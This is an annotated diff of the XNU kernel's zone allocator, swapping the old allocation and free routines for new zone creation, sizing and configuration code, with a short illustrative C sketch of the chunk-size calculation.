+#endif /* !ZALLOC_TEST */
+#pragma mark zone creation, configuration, destruction
+#if !ZALLOC_TEST
 
-#if CONFIG_GZALLOC
-allocated_from_gzalloc:
-#endif
-#if KASAN_ZALLOC
-       if (zone->kasan_redzone) {
-               addr = kasan_alloc(addr, elem_size,
-                   elem_size - 2 * zone->kasan_redzone, zone->kasan_redzone);
-               elem_size -= 2 * zone->kasan_redzone;
-       }
-       /*
-        * Initialize buffer with unique pattern only if memory
-        * wasn't expected to be zeroed.
-        */
-       if (!zone->zfree_clear_mem && !(flags & Z_ZERO)) {
-               kasan_leak_init(addr, elem_size);
-       }
-#endif /* KASAN_ZALLOC */
-       if ((flags & Z_ZERO) && !zone->zfree_clear_mem) {
-               bzero((void *)addr, elem_size);
-       }
+static zone_t
+zone_init_defaults(zone_id_t zid)
+{
+       zone_t z = &zone_array[zid];
 
-       TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr);
+       z->z_wired_max = ~0u;
+       z->collectable = true;
+       z->expandable = true;
+       z->z_submap_idx = Z_SUBMAP_IDX_GENERAL;
 
-out_nomem:
-       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
-       return (void *)addr;
+       lck_spin_init(&z->z_lock, &zone_locks_grp, LCK_ATTR_NULL);
+       STAILQ_INIT(&z->z_recirc);
+       return z;
 }
 
-void *
-zalloc(union zone_or_view zov)
+static bool
+zone_is_initializing(zone_t z)
 {
-       return zalloc_flags(zov, Z_WAITOK);
+       return !z->z_self && !z->z_destroyed;
 }
 
-void *
-zalloc_noblock(union zone_or_view zov)
+void
+zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx)
 {
-       return zalloc_flags(zov, Z_NOWAIT);
+       if (!zone_is_initializing(zone)) {
+               panic("%s: called after zone_create()", __func__);
+       }
+       if (sub_map_idx > zone_last_submap_idx) {
+               panic("zone_set_submap_idx(%d) > %d", sub_map_idx, zone_last_submap_idx);
+       }
+       zone->z_submap_idx = sub_map_idx;
 }
 
-void *
-zalloc_flags(union zone_or_view zov, zalloc_flags_t flags)
+void
+zone_set_noexpand(zone_t zone, vm_size_t nelems)
 {
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(!zone->percpu);
-       return zalloc_ext(zone, zstats, flags, 0);
+       if (!zone_is_initializing(zone)) {
+               panic("%s: called after zone_create()", __func__);
+       }
+       zone->expandable = false;
+       zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems);
 }
 
-void *
-zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags)
+void
+zone_set_exhaustible(zone_t zone, vm_size_t nelems)
 {
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(zone->percpu);
-       return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags, 0));
+       if (!zone_is_initializing(zone)) {
+               panic("%s: called after zone_create()", __func__);
+       }
+       zone->expandable = false;
+       zone->exhaustible = true;
+       zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems);
 }
 
-static void *
-_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask)
+/**
+ * @function zone_create_find
+ *
+ * @abstract
+ * Finds an unused zone for the given name and element size.
+ *
+ * @param name          the zone name
+ * @param size          the element size (including redzones, ...)
+ * @param flags         the flags passed to @c zone_create*
+ * @param zid_inout     the desired zone ID or ZONE_ID_ANY
+ *
+ * @returns             a zone to initialize further.
+ */
+static zone_t
+zone_create_find(
+       const char             *name,
+       vm_size_t               size,
+       zone_create_flags_t     flags,
+       zone_id_t              *zid_inout)
 {
-       const zone_addr_kind_t kind = ZONE_ADDR_NATIVE;
-       struct zone_page_metadata *page_meta;
-       vm_offset_t offs, addr;
-       zone_pva_t pva;
+       zone_id_t nzones, zid = *zid_inout;
+       zone_t z;
 
-       assert(ml_get_interrupts_enabled() ||
-           ml_is_quiescing() ||
-           debug_mode_active() ||
-           startup_phase < STARTUP_SUB_EARLY_BOOT);
+       simple_lock(&all_zones_lock, &zone_locks_grp);
 
-       size = (size + mask) & ~mask;
-       assert(size <= PAGE_SIZE);
+       nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed);
+       assert(num_zones_in_use <= nzones && nzones < MAX_ZONES);
 
-       lock_zone(zone);
-       assert(zone->z_self == zone);
+       if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) {
+               /*
+                * The first time around, make sure the reserved zone IDs
+                * have an initialized lock as zone_index_foreach() will
+                * enumerate them.
+                */
+               while (nzones < ZONE_ID__FIRST_DYNAMIC) {
+                       zone_init_defaults(nzones++);
+               }
+
+               os_atomic_store(&num_zones, nzones, release);
+       }
+
+       if (zid != ZONE_ID_ANY) {
+               if (zid >= ZONE_ID__FIRST_DYNAMIC) {
+                       panic("zone_create: invalid desired zone ID %d for %s",
+                           zid, name);
+               }
+               if (flags & ZC_DESTRUCTIBLE) {
+                       panic("zone_create: ID %d (%s) must be permanent", zid, name);
+               }
+               if (zone_array[zid].z_self) {
+                       panic("zone_create: creating zone ID %d (%s) twice", zid, name);
+               }
+               z = &zone_array[zid];
+       } else {
+               if (flags & ZC_DESTRUCTIBLE) {
+                       /*
+                        * If possible, find a previously zdestroy'ed zone in the
+                        * zone_array that we can reuse.
+                        */
+                       for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES);
+                           i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) {
+                               z = &zone_array[i];
 
-       for (;;) {
-               pva = zone->pages_intermediate;
-               while (!zone_pva_is_null(pva)) {
-                       page_meta = zone_pva_to_meta(pva, kind);
-                       if (page_meta->zm_freelist_offs + size <= PAGE_SIZE) {
-                               goto found;
+                               /*
+                                * If the zone name and the element size are the
+                                * same, we can just reuse the old zone struct.
+                                */
+                               if (strcmp(z->z_name, name) || zone_elem_size(z) != size) {
+                                       continue;
+                               }
+                               bitmap_clear(zone_destroyed_bitmap, i);
+                               z->z_destroyed = false;
+                               z->z_self = z;
+                               zid = (zone_id_t)i;
+                               goto out;
                        }
-                       pva = page_meta->zm_page_next;
                }
 
-               zone_refill_synchronously_locked(zone, Z_WAITOK);
-       }
-
-found:
-       offs = (page_meta->zm_freelist_offs + mask) & ~mask;
-       page_meta->zm_freelist_offs = offs + size;
-       page_meta->zm_alloc_count += size;
-       zone->countfree -= size;
-       if (__probable(zone->z_stats)) {
-               zpercpu_get(zone->z_stats)->zs_mem_allocated += size;
-       }
+               zid = nzones++;
+               z = zone_init_defaults(zid);
 
-       if (page_meta->zm_alloc_count >= PAGE_SIZE - sizeof(vm_offset_t)) {
-               zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind);
+               /*
+                * The release barrier pairs with the acquire in
+                * zone_index_foreach() and makes sure that enumeration loops
+                * always see an initialized zone lock.
+                */
+               os_atomic_store(&num_zones, nzones, release);
        }
 
-       unlock_zone(zone);
-
-       addr = offs + zone_pva_to_addr(pva);
+out:
+       num_zones_in_use++;
+       simple_unlock(&all_zones_lock);
 
-       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
-       return (void *)addr;
+       *zid_inout = zid;
+       return z;
 }
 
-static void *
-_zalloc_permanent_large(size_t size, vm_offset_t mask)
+__abortlike
+static void
+zone_create_panic(const char *name, const char *f1, const char *f2)
 {
-       kern_return_t kr;
-       vm_offset_t addr;
-
-       kr = kernel_memory_allocate(kernel_map, &addr, size, mask,
-           KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO,
-           VM_KERN_MEMORY_KALLOC);
-       if (kr != 0) {
-               panic("zalloc_permanent: unable to allocate %zd bytes (%d)",
-                   size, kr);
-       }
-       return (void *)addr;
+       panic("zone_create: creating zone %s: flag %s and %s are incompatible",
+           name, f1, f2);
 }
+#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \
+       if ((flags) & forbidden_flag) { \
+               zone_create_panic(name, #current_flag, #forbidden_flag); \
+       }
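For reference, a call such as zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN), as used further down in zone_create_ext(), expands to roughly:

        if ((flags) & ZC_ALLOW_FOREIGN) {
                zone_create_panic(name, "ZC_PERCPU", "ZC_ALLOW_FOREIGN");
        }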
 
-void *
-zalloc_permanent(vm_size_t size, vm_offset_t mask)
+/*
+ * Adjusts the size of the element based on minimum size, alignment,
+ * and KASAN redzones
+ */
+static vm_size_t
+zone_elem_adjust_size(
+       const char             *name __unused,
+       vm_size_t               elem_size,
+       zone_create_flags_t     flags __unused,
+       uint32_t               *redzone __unused)
 {
-       if (size <= PAGE_SIZE) {
-               zone_t zone = &zone_array[ZONE_ID_PERMANENT];
-               return _zalloc_permanent(zone, size, mask);
+       vm_size_t size;
+       /*
+        * Adjust element size for minimum size and pointer alignment
+        */
+       size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t);
+       if (size < ZONE_MIN_ELEM_SIZE) {
+               size = ZONE_MIN_ELEM_SIZE;
        }
-       return _zalloc_permanent_large(size, mask);
-}
 
-void *
-zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask)
-{
-       zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT];
-       return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask));
+#if KASAN_ZALLOC
+       /*
+        * Expand the zone allocation size to include the redzones.
+        *
+        * For page-multiple zones add a full guard page because they
+        * likely require alignment.
+        */
+       uint32_t redzone_tmp;
+       if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) {
+               redzone_tmp = 0;
+       } else if ((size & PAGE_MASK) == 0) {
+               if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) {
+                       panic("zone_create: zone %s can't provide more than PAGE_SIZE "
+                           "alignment", name);
+               }
+               redzone_tmp = PAGE_SIZE;
+       } else if (flags & ZC_ALIGNMENT_REQUIRED) {
+               redzone_tmp = 0;
+       } else {
+               redzone_tmp = KASAN_GUARD_SIZE;
+       }
+       size += redzone_tmp * 2;
+       if (redzone) {
+               *redzone = redzone_tmp;
+       }
+#endif
+       return size;
 }
 
-void
-zalloc_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1)
+/*
+ * Returns the allocation chunk size that has the least fragmentation
+ */
+static vm_size_t
+zone_get_min_alloc_granule(
+       vm_size_t               elem_size,
+       zone_create_flags_t     flags)
 {
-       zone_index_foreach(i) {
-               zone_t z = &zone_array[i];
-
-               if (z->no_callout) {
-                       /* async_pending will never be set */
-                       continue;
+       vm_size_t alloc_granule = PAGE_SIZE;
+       if (flags & ZC_PERCPU) {
+               alloc_granule = PAGE_SIZE * zpercpu_count();
+               if (PAGE_SIZE % elem_size > 256) {
+                       panic("zone_create: per-cpu zone has too much fragmentation");
                }
-
-               lock_zone(z);
-               if (z->z_self && z->async_pending) {
-                       z->async_pending = false;
-                       zone_refill_synchronously_locked(z, Z_WAITOK);
+       } else if ((elem_size & PAGE_MASK) == 0) {
+               /* zero fragmentation by definition */
+               alloc_granule = elem_size;
+       } else if (alloc_granule % elem_size == 0) {
+               /* zero fragmentation by definition */
+       } else {
+               vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule;
+               vm_size_t alloc_tmp = PAGE_SIZE;
+               while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) {
+                       vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp;
+                       if (frag_tmp < frag) {
+                               frag = frag_tmp;
+                               alloc_granule = alloc_tmp;
+                       }
                }
-               unlock_zone(z);
        }
+       return alloc_granule;
 }
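To illustrate the search above with a hypothetical 1416-byte element and 4KiB pages: one page wastes 4096 % 1416 = 1264 bytes (~31%), two pages ~14%, three pages ~8%, and the loop keeps whichever candidate within ZONE_MAX_ALLOC_SIZE has the lowest waste. A standalone sketch, assuming a 4KiB page and an 8-page cap:

#include <stdio.h>

#define SKETCH_PAGE_SIZE   4096u
#define SKETCH_MAX_ALLOC   (8u * SKETCH_PAGE_SIZE)  /* stand-in for ZONE_MAX_ALLOC_SIZE */

/* Standalone sketch of the least-fragmentation granule search above. */
static unsigned
min_alloc_granule_sketch(unsigned elem_size)
{
        unsigned granule = SKETCH_PAGE_SIZE;

        if (elem_size % SKETCH_PAGE_SIZE == 0) {
                return elem_size;       /* zero fragmentation by definition */
        }
        if (granule % elem_size == 0) {
                return granule;         /* zero fragmentation by definition */
        }

        unsigned frag = (granule % elem_size) * 100 / granule;
        for (unsigned tmp = 2 * SKETCH_PAGE_SIZE; tmp <= SKETCH_MAX_ALLOC;
            tmp += SKETCH_PAGE_SIZE) {
                unsigned frag_tmp = (tmp % elem_size) * 100 / tmp;
                if (frag_tmp < frag) {
                        frag = frag_tmp;
                        granule = tmp;
                }
        }
        return granule;
}

int
main(void)
{
        printf("granule for 1416-byte elements: %u bytes\n",
            min_alloc_granule_sketch(1416));  /* 32768 with these assumptions */
        return 0;
}

With those assumptions the sketch settles on a 32KiB chunk, where the waste falls to 200 bytes (well under 1%).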
 
-/*
- * Adds the element to the head of the zone's free list
- * Keeps a backup next-pointer at the end of the element
- */
-void
-zfree_direct_locked(zone_t zone, vm_offset_t element, bool poison)
+vm_size_t
+zone_get_foreign_alloc_size(
+       const char             *name __unused,
+       vm_size_t               elem_size,
+       zone_create_flags_t     flags,
+       uint16_t                min_pages)
 {
-       struct zone_page_metadata *page_meta;
-       vm_offset_t page, old_head;
-       zone_addr_kind_t kind;
-       vm_size_t elem_size = zone_elem_size(zone);
-
-       vm_offset_t *primary  = (vm_offset_t *) element;
-       vm_offset_t *backup   = get_backup_ptr(elem_size, primary);
+       vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags,
+           NULL);
+       vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size,
+           flags);
+       vm_size_t min_size = min_pages * PAGE_SIZE;
+       /*
+        * Round up min_size to a multiple of alloc_granule
+        */
+       return ((min_size + alloc_granule - 1) / alloc_granule)
+              * alloc_granule;
+}
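For example, with a hypothetical 12KiB granule and min_pages == 2 (an 8KiB request), the round-up gives ((8192 + 12288 - 1) / 12288) * 12288 == 12288, i.e. one full granule.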
 
-       page_meta = zone_allocated_element_resolve(zone, element, &page, &kind);
-       old_head = zone_page_meta_get_freelist(zone, page_meta, page);
+zone_t
+zone_create_ext(
+       const char             *name,
+       vm_size_t               size,
+       zone_create_flags_t     flags,
+       zone_id_t               zid,
+       void                  (^extra_setup)(zone_t))
+{
+       vm_size_t alloc;
+       uint32_t redzone;
+       zone_t z;
 
-       if (__improbable(old_head == element)) {
-               panic("zfree: double free of %p to zone %s%s\n",
-                   (void *) element, zone_heap_name(zone), zone->z_name);
+       if (size > ZONE_MAX_ALLOC_SIZE) {
+               panic("zone_create: element size too large: %zd", (size_t)size);
        }
 
-#if ZALLOC_ENABLE_POISONING
-       if (poison && elem_size < ZONE_MIN_ELEM_SIZE) {
-               assert(zone->percpu);
-               poison = false;
+       if (size < 2 * sizeof(vm_size_t)) {
+               /* Elements are too small for kasan. */
+               flags |= ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE;
        }
-#else
-       poison = false;
-#endif
 
+       size = zone_elem_adjust_size(name, size, flags, &redzone);
        /*
-        * Always write a redundant next pointer
-        * So that it is more difficult to forge, xor it with a random cookie
-        * A poisoned element is indicated by using zp_poisoned_cookie
-        * instead of zp_nopoison_cookie
+        * Allocate the zone slot; return early if we found an existing match.
         */
-
-       *backup = old_head ^ (poison ? zp_poisoned_cookie : zp_nopoison_cookie);
+       z = zone_create_find(name, size, flags, &zid);
+       if (__improbable(z->z_self)) {
+               /* We found a zone to reuse */
+               return z;
+       }
 
        /*
-        * Insert this element at the head of the free list. We also xor the
-        * primary pointer with the zp_nopoison_cookie to make sure a free
-        * element does not provide the location of the next free element directly.
+        * Initialize the zone properly.
         */
-       *primary = old_head ^ zp_nopoison_cookie;
 
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               vm_tag_t tag = (ZTAG(zone, element)[0] >> 1);
-               // set the tag with b0 clear so the block remains inuse
-               ZTAG(zone, element)[0] = 0xFFFE;
-               vm_tag_update_zone_size(tag, zone->tag_zone_index,
-                   -((int64_t)elem_size), 0);
+       /*
+        * If the kernel is post lockdown, copy the zone name passed in.
+        * Else simply maintain a pointer to the name string as it can only
+        * be a core XNU zone (no unloadable kext exists before lockdown).
+        */
+       if (startup_phase >= STARTUP_SUB_LOCKDOWN) {
+               size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN);
+               char *buf = zalloc_permanent(nsz, ZALIGN_NONE);
+               strlcpy(buf, name, nsz);
+               z->z_name = buf;
+       } else {
+               z->z_name = name;
        }
-#endif /* VM_MAX_TAG_ZONES */
-
-       zone_page_meta_set_freelist(page_meta, page, element);
-       if (os_sub_overflow(page_meta->zm_alloc_count, 1,
-           &page_meta->zm_alloc_count)) {
-               zone_page_meta_accounting_panic(zone, page_meta,
-                   "alloc_count wrap-around");
+       if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) {
+               z->z_stats = zalloc_percpu_permanent_type(struct zone_stats);
+       } else {
+               /*
+                * zone_init() hasn't run yet, use the storage provided by
+                * zone_stats_startup(), and zone_init() will replace it
+                * with the final value once the PERCPU zone exists.
+                */
+               z->z_stats = __zpcpu_mangle_for_boot(&zone_stats_startup[zone_index(z)]);
        }
-       zone->countfree++;
 
-       if (kind == ZONE_ADDR_FOREIGN) {
-               if (old_head == 0) {
-                       /* first foreign element freed on page, move from all_used_foreign */
-                       zone_meta_requeue(zone, &zone->pages_any_free_foreign, page_meta, kind);
-               }
-       } else if (page_meta->zm_alloc_count == 0) {
-               /* whether the page was on the intermediate or all_used, queue, move it to free */
-               zone_meta_requeue(zone, &zone->pages_all_free, page_meta, kind);
-               zone->allfree_page_count += page_meta->zm_page_count;
-       } else if (old_head == 0) {
-               /* first free element on page, move from all_used */
-               zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind);
+       alloc = zone_get_min_alloc_granule(size, flags);
+
+       if (flags & ZC_KALLOC_HEAP) {
+               size_t rem = (alloc % size) / (alloc / size);
+
+               /*
+                * Try to grow the element size and spread elements out more if
+                * the remaining space is large enough.
+                */
+               size += rem & ~(KALLOC_MINALIGN - 1);
        }
 
-#if KASAN_ZALLOC
-       if (zone->percpu) {
-               zpercpu_foreach_cpu(i) {
-                       kasan_poison_range(element + ptoa(i), elem_size,
-                           ASAN_HEAP_FREED);
-               }
+       z->z_elem_size = (uint16_t)size;
+       z->z_chunk_pages = (uint16_t)atop(alloc);
+       if (flags & ZC_PERCPU) {
+               z->z_chunk_elems = (uint16_t)(PAGE_SIZE / z->z_elem_size);
        } else {
-               kasan_poison_range(element, elem_size, ASAN_HEAP_FREED);
+               z->z_chunk_elems = (uint16_t)(alloc / z->z_elem_size);
+       }
+       if (zone_element_idx(zone_element_encode(0,
+           z->z_chunk_elems - 1, ZPM_AUTO)) != z->z_chunk_elems - 1) {
+               panic("zone_element_encode doesn't work for zone [%s]", name);
        }
-#endif
-}
-
-/*
- *     The function is noinline when zlog can be used so that the backtracing can
- *     reliably skip the zfree_ext() and zfree_log_trace()
- *     boring frames.
- */
-#if ZONE_ENABLE_LOGGING
-__attribute__((noinline))
-#endif
-void
-zfree_ext(zone_t zone, zone_stats_t zstats, void *addr)
-{
-       vm_offset_t     elem = (vm_offset_t)addr;
-       vm_size_t       elem_size = zone_elem_size(zone);
-       bool            poison = false;
-
-       DTRACE_VM2(zfree, zone_t, zone, void*, addr);
-       TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem);
 
 #if KASAN_ZALLOC
-       if (kasan_quarantine_freed_element(&zone, &addr)) {
-               return;
+       z->z_kasan_redzone = redzone;
+       if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) {
+               z->kasan_fakestacks = true;
        }
+#endif
+
        /*
-        * kasan_quarantine_freed_element() might return a different
-        * {zone, addr} than the one being freed for kalloc heaps.
-        *
-        * Make sure we reload everything.
+        * Handle KPI flags
         */
-       elem = (vm_offset_t)addr;
-       elem_size = zone_elem_size(zone);
+#if __LP64__
+       if (flags & ZC_SEQUESTER) {
+               z->z_va_sequester = true;
+       }
 #endif
+       /* ZC_CACHING applied after all configuration is done */
+       if (flags & ZC_NOCACHING) {
+               z->z_nocaching = true;
+       }
+
+       if (flags & ZC_PERCPU) {
+               /*
+                * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for
+                * pointer-sized allocations which poisoning doesn't support.
+                */
+               zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN);
+               z->z_percpu = true;
+               z->gzalloc_exempt = true;
+               z->z_free_zeroes = true;
+       }
+       if (flags & ZC_ZFREE_CLEARMEM) {
+               z->z_free_zeroes = true;
+       }
+       if (flags & ZC_NOGC) {
+               z->collectable = false;
+       }
+       if (flags & ZC_NOENCRYPT) {
+               z->z_noencrypt = true;
+       }
+       if (flags & ZC_ALIGNMENT_REQUIRED) {
+               z->alignment_required = true;
+       }
+       if (flags & ZC_NOGZALLOC) {
+               z->gzalloc_exempt = true;
+       }
+       if (flags & ZC_NOCALLOUT) {
+               z->no_callout = true;
+       }
+       if (flags & ZC_DESTRUCTIBLE) {
+               zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN);
+               z->z_destructible = true;
+       }
 
-#if CONFIG_ZLEAKS
        /*
-        * Zone leak detection: un-track the allocation
+        * Handle Internal flags
         */
-       if (__improbable(zone->zleak_on)) {
-               zleak_free(elem, elem_size);
+       if (flags & ZC_ALLOW_FOREIGN) {
+               z->z_allows_foreign = true;
        }
-#endif /* CONFIG_ZLEAKS */
+       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
+           (flags & ZC_DATA_BUFFERS)) {
+               z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES;
+       }
+       if (flags & ZC_KASAN_NOQUARANTINE) {
+               z->kasan_noquarantine = true;
+       }
+       /* ZC_KASAN_NOREDZONE already handled */
 
-#if CONFIG_ZCACHE
        /*
-        * Note: if zone caching is on, gzalloc and tags aren't used
-        *       so we can always check this first
+        * Then if there's extra tuning, do it
         */
-       if (zone_caching_enabled(zone)) {
-               return zcache_free_to_cpu_cache(zone, zstats, (vm_offset_t)addr);
+       if (extra_setup) {
+               extra_setup(z);
        }
-#endif /* CONFIG_ZCACHE */
 
+       /*
+        * Configure debugging features
+        */
 #if CONFIG_GZALLOC
-       if (__improbable(zone->gzalloc_tracked)) {
-               return gzalloc_free(zone, zstats, addr);
+       gzalloc_zone_init(z); /* might set z->gzalloc_tracked */
+       if (z->gzalloc_tracked) {
+               z->z_nocaching = true;
        }
-#endif /* CONFIG_GZALLOC */
-
+#endif
 #if ZONE_ENABLE_LOGGING
-       if (__improbable(DO_LOGGING(zone))) {
-               zfree_log_trace(zone, elem);
+       if (!z->gzalloc_tracked && num_zones_logged < max_num_zones_to_log) {
+               /*
+                * Check for and set up zone leak detection if requested via boot-args.
+                * might set z->zone_logging
+                */
+               zone_setup_logging(z);
        }
 #endif /* ZONE_ENABLE_LOGGING */
-
-       if (zone->zfree_clear_mem) {
-               poison = zfree_clear(zone, elem, elem_size);
+#if VM_MAX_TAG_ZONES
+       if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) {
+               static int tag_zone_index;
+               vm_offset_t esize = zone_elem_size(z);
+               z->tags = true;
+               z->tags_inline = (((page_size + esize - 1) / esize) <=
+                   (sizeof(uint32_t) / sizeof(uint16_t)));
+               z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed);
+               assert(z->tag_zone_index < VM_MAX_TAG_ZONES);
        }
+#endif
 
-       lock_zone(zone);
-       assert(zone->z_self == zone);
-
-       if (!poison) {
-               poison = zfree_poison_element(zone, &zone->zp_count, elem);
+       /*
+        * Finally, fixup properties based on security policies, boot-args, ...
+        */
+       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
+           z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) {
+               z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES;
        }
-
-       if (__probable(zstats != NULL)) {
-               /*
-                * The few vm zones used before zone_init() runs do not have
-                * per-cpu stats yet
-                */
-               zpercpu_get(zstats)->zs_mem_freed += elem_size;
+#if __LP64__
+       if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) &&
+           (flags & ZC_NOSEQUESTER) == 0 &&
+           z->z_submap_idx == Z_SUBMAP_IDX_GENERAL) {
+               z->z_va_sequester = true;
+       }
+#endif
+       /*
+        * Clear the entire element for non-data zones, and up to zp_min_size
+        * for data zones.
+        */
+       if (z->z_submap_idx != Z_SUBMAP_IDX_BAG_OF_BYTES) {
+               z->z_free_zeroes = true;
+       } else if (size <= zp_min_size) {
+               z->z_free_zeroes = true;
        }
 
-       zfree_direct_locked(zone, elem, poison);
-
-       unlock_zone(zone);
-}
-
-void
-(zfree)(union zone_or_view zov, void *addr)
-{
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(!zone->percpu);
-       zfree_ext(zone, zstats, addr);
-}
-
-void
-zfree_percpu(union zone_or_view zov, void *addr)
-{
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(zone->percpu);
-       zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr));
-}
-
-#pragma mark vm integration, MIG routines
-
-/*
- * Drops (i.e. frees) the elements in the all free pages queue of a zone.
- * Called by zone_gc() on each zone and when a zone is zdestroy()ed.
- */
-static void
-zone_drop_free_elements(zone_t z)
-{
-       const zone_addr_kind_t    kind = ZONE_ADDR_NATIVE;
-       unsigned int              total_freed_pages = 0;
-       struct zone_page_metadata *page_meta, *seq_meta;
-       vm_address_t              page_addr;
-       vm_size_t                 size_to_free;
-       vm_size_t                 free_count;
-       uint32_t                  page_count;
-
-       current_thread()->options |= TH_OPT_ZONE_PRIV;
-       lock_zone(z);
-
-       while (!zone_pva_is_null(z->pages_all_free)) {
+       if ((flags & ZC_CACHING) && !z->z_nocaching) {
                /*
-                * If any replenishment threads are running, defer to them,
-                * so that we don't deplete reserved zones.
+                * If zcache hasn't been initialized yet, remember our decision.
                 *
-                * The timing of the check isn't super important, as there are
-                * enough reserves to allow freeing an extra page_meta.
-                *
-                * Hence, we can check without grabbing the lock every time
-                * through the loop.  We do need the lock however to avoid
-                * missing a wakeup when we decide to block.
-                */
-               if (zone_replenish_active > 0) {
-                       lck_spin_lock(&zone_replenish_lock);
-                       if (zone_replenish_active > 0) {
-                               assert_wait(&zone_replenish_active, THREAD_UNINT);
-                               lck_spin_unlock(&zone_replenish_lock);
-                               unlock_zone(z);
-                               thread_block(THREAD_CONTINUE_NULL);
-                               lock_zone(z);
-                               continue;
-                       }
-                       lck_spin_unlock(&zone_replenish_lock);
-               }
-
-               page_meta = zone_pva_to_meta(z->pages_all_free, kind);
-               page_count = page_meta->zm_page_count;
-               free_count = zone_elem_count(z, ptoa(page_count), kind);
-
-               /*
-                * Don't drain zones with async refill to below the refill
-                * threshold, as they need some reserve to function properly.
+                * zone_enable_caching() will be called again by
+                * zcache_bootstrap(), while the system is still single
+                * threaded, to build the missing caches.
                 */
-               if (!z->destroyed && z->prio_refill_count &&
-                   (vm_size_t)(z->countfree - free_count) < z->prio_refill_count) {
-                       break;
-               }
-
-               zone_meta_queue_pop(z, &z->pages_all_free, kind, &page_addr);
-
-               if (os_sub_overflow(z->countfree, free_count, &z->countfree)) {
-                       zone_accounting_panic(z, "countfree wrap-around");
-               }
-               if (os_sub_overflow(z->countavail, free_count, &z->countavail)) {
-                       zone_accounting_panic(z, "countavail wrap-around");
-               }
-               if (os_sub_overflow(z->allfree_page_count, page_count,
-                   &z->allfree_page_count)) {
-                       zone_accounting_panic(z, "allfree_page_count wrap-around");
-               }
-               if (os_sub_overflow(z->page_count, page_count, &z->page_count)) {
-                       zone_accounting_panic(z, "page_count wrap-around");
-               }
-
-               os_atomic_sub(&zones_phys_page_count, page_count, relaxed);
-               os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed);
-
-               bzero(page_meta, sizeof(*page_meta) * page_count);
-               seq_meta = page_meta;
-               page_meta = NULL; /* page_meta fields are zeroed, prevent reuse */
-
-               unlock_zone(z);
-
-               /* Free the pages for metadata and account for them */
-               total_freed_pages += page_count;
-               size_to_free = ptoa(page_count);
-#if KASAN_ZALLOC
-               kasan_poison_range(page_addr, size_to_free, ASAN_VALID);
-#endif
-#if VM_MAX_TAG_ZONES
-               if (z->tags) {
-                       ztMemoryRemove(z, page_addr, size_to_free);
-               }
-#endif /* VM_MAX_TAG_ZONES */
-
-               if (z->va_sequester && z->alloc_pages == page_count) {
-                       kernel_memory_depopulate(submap_for_zone(z), page_addr,
-                           size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE);
+               if (__probable(zc_magazine_zone)) {
+                       zone_enable_caching(z);
                } else {
-                       kmem_free(submap_for_zone(z), page_addr, size_to_free);
-                       seq_meta = NULL;
+                       z->z_pcpu_cache =
+                           __zpcpu_mangle_for_boot(&zone_cache_startup[zid]);
                }
-               thread_yield_to_preemption();
-
-               lock_zone(z);
-
-               if (seq_meta) {
-                       zone_meta_queue_push(z, &z->pages_sequester, seq_meta, kind);
-                       z->sequester_page_count += page_count;
-               }
-       }
-       if (z->destroyed) {
-               assert(zone_pva_is_null(z->pages_all_free));
-               assert(z->allfree_page_count == 0);
-       }
-       unlock_zone(z);
